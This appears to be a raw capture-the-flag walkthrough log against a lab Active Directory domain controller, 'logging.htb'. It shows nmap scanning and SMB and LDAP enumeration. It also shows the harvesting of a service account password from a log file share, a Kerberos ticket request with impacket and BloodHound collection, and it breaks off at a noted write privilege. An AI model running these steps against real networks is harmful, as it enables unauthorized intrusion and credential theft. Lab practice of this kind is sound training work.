wallace.everette / Welcome2026@

└─$ nmap -p- -sSCV 10.129.78.70 --min-rate 999 
Starting Nmap 7.95 ( https://nmap.org ) at 2026-04-19 22:50 EDT
Stats: 0:00:01 elapsed; 0 hosts completed (0 up), 1 undergoing Ping Scan
Parallel DNS resolution of 1 host. Timing: About 0.00% done
Stats: 0:01:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 53.33% done; ETC: 22:52 (0:00:23 remaining)
Nmap scan report for 10.129.78.70
Host is up (0.088s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-04-20 09:52:05Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: logging.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-20T09:53:16+00:00; +7h00m27s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: logging.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-20T09:53:15+00:00; +7h00m26s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: logging.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
|_ssl-date: 2026-04-20T09:53:16+00:00; +7h00m27s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: logging.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2026-04-20T09:53:16+00:00; +7h00m27s from scanner time.
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:DC01.logging.htb, DNS:logging.htb, DNS:logging
| Not valid before: 2026-04-17T03:20:01
|_Not valid after:  2106-04-17T03:20:01
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp  open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title.
8531/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_ssl-date: 2026-04-20T09:53:15+00:00; +7h00m26s from scanner time.
| ssl-cert: Subject: commonName=DC01.logging.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.logging.htb
| Not valid before: 2026-04-16T15:12:07
|_Not valid after:  2027-04-16T15:12:07
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| tls-alpn: 
|_  http/1.1
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49687/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49719/tcp open  msrpc         Microsoft Windows RPC
49745/tcp open  msrpc         Microsoft Windows RPC
49775/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m26s, deviation: 0s, median: 7h00m25s
| smb2-time: 
|   date: 2026-04-20T09:53:05
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required


SMB 
└─$ netexec smb 10.129.78.70 -u wallace.everette -p 'Welcome2026@' --shares
SMB         10.129.78.70    445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:logging.htb) (signing:True) (SMBv1:False)
SMB         10.129.78.70    445    DC01             [+] logging.htb\wallace.everette:Welcome2026@ 
 SMB         10.129.78.70    445    DC01             [*] Enumerated shares
SMB         10.129.78.70    445    DC01             Share           Permissions     Remark
SMB         10.129.78.70    445    DC01             -----           -----------     ------
SMB         10.129.78.70    445    DC01             ADMIN$                          Remote Admin
SMB         10.129.78.70    445    DC01             C$                              Default share
SMB         10.129.78.70    445    DC01             IPC$            READ            Remote IPC
SMB         10.129.78.70    445    DC01             Logs            READ            
SMB         10.129.78.70    445    DC01             NETLOGON        READ            Logon server share 
SMB         10.129.78.70    445    DC01             SYSVOL          READ            Logon server share 
SMB         10.129.78.70    445    DC01             WSUSTemp                        A network share used by Local Publishing from a Remote WSUS Console Instance.



HR01.logging.htb

└─$ ldapsearch -x -H ldap://10.129.78.70 -s base namingcontexts 
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=logging,DC=htb
namingcontexts: CN=Configuration,DC=logging,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=logging,DC=htb
namingcontexts: DC=DomainDnsZones,DC=logging,DC=htb
namingcontexts: DC=ForestDnsZones,DC=logging,DC=htb



└─$ smbclient //logging.htb/Logs -U wallace.everette --password 'Welcome2026@' -l
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Thu Apr 16 19:10:09 2026
  ..                                  D        0  Thu Apr 16 19:10:09 2026
  Audit_Heartbeat.log                 A     1294  Thu Apr 16 19:10:09 2026
  IdentitySync_Trace_20260219.log      A     8488  Thu Apr 16 19:10:09 2026
  Service_State.log                   A      468  Thu Apr 16 19:10:09 2026
  TaskMonitor.log                     A     1170  Thu Apr 16 19:10:09 2026

		6657279 blocks of size 4096. 1036658 blocks available
smb: \> more IdentitySync_Trace_20260219.log 
[2026-02-09 03:00:03.110] [PID:4102] [Thread:04] TRACE - Initializing LdapConnection object...
[2026-02-09 03:00:03.125] [PID:4102] [Thread:04] VERBOSE - ConnectionContext Dump: { Domain: "logging.htb", Server: "DC01", SSL: "False", BindUser: "LOGGING\svc_recovery", BindPass: "Em3rg3ncyPa$$2025", Timeout: 30 }

svc_recovery  Em3rg3ncyPa$$2026


└─$ sudo systemctl restart systemd-timesyncd                                
[sudo] password for ed: 
                                                                                                    
┌──(ed㉿kali)-[~/htb/logging]
└─$ sudo systemctl restart timers.target                                            
                                                                                                    
┌──(ed㉿kali)-[~/htb/logging]
└─$ sudo ntpdate 10.129.78.70                                                       
2026-04-20 13:09:29.867215 (-0400) -0.126405 +/- 0.038025 10.129.78.70 s1 no-leap

└─$ impacket-getTGT 'logging.htb/svc_recovery:Em3rg3ncyPa$$2026' -dc-ip 10.129.78.70
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in svc_recovery.ccache



└─$ export KRB5CCNAME=svc_recovery.ccache 

└─$ bloodhound-python -u svc_recovery  -k -no-pass  -d 'logging.htb' -dc 'DC01.logging.htb' -ns 10.129.78.70 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: logging.htb
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: DC01.logging.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC01.logging.htb
INFO: Found 14 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.logging.htb
INFO: Done in 00M 17S
INFO: Compressing output into 20260420131358_bloodhound.zip

FROM BLOODHOUND, we get svc_recovery has GenericWrite to msa_health$
